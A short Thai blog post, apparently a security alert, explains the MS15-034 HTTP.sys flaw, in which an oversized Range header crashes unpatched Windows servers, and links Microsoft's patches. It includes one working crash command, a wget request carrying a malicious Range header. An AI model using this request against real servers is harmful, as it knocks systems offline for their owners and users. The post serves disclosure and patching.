บั๊กความร้ายแรงสูง คือ MS15-034 สำหรับเครื่องที่ยังไม่อัพเดต เซิร์ฟเวอร์ในความดูแลตั้งแต่ windows server 2008R2 ขึ้นไป อาจจะถูกยิงให้แครชทั้งเครื่องได้ง่ายๆ ด้วยคำสั่งเดียว ช่องโหว่นี้เกิดจากการรับค่าใน HTTP Header ที่ฟิลด์ Range ผิดพลาด หากใส่ค่าใหญ่เกินไปก็สามารถทำให้เคอร์เนลแครชได้ทันที ในคลิปตัวอย่างนี้ ได้ใช้ระบบปฏิบัติการ windows server 2012R2 และใช้เครื่องลูกข่ายเป็น Ubuntu 14
VIDEO
ขอขอบคุณ : https://www.blognone.com/node/67668
#####################################
ตัวอย่างคำสั่งในการทดสอบ
wget --header="Range: bytes=18-18446744073709551615" http://192.168.1.10/iis-85.png
######################################
แพตช์สำหรับอุดช่องโหว่
https://technet.microsoft.com/en-us/library/security/ms15-034.aspx #######################################
แพตช์สำหรับ เครื่องที่ยังไม่ได้ติดตั้ง Windows Server 2012 R2 Update (KB2919355)
http://www.microsoft.com/en-us/download/details.aspx?id=42334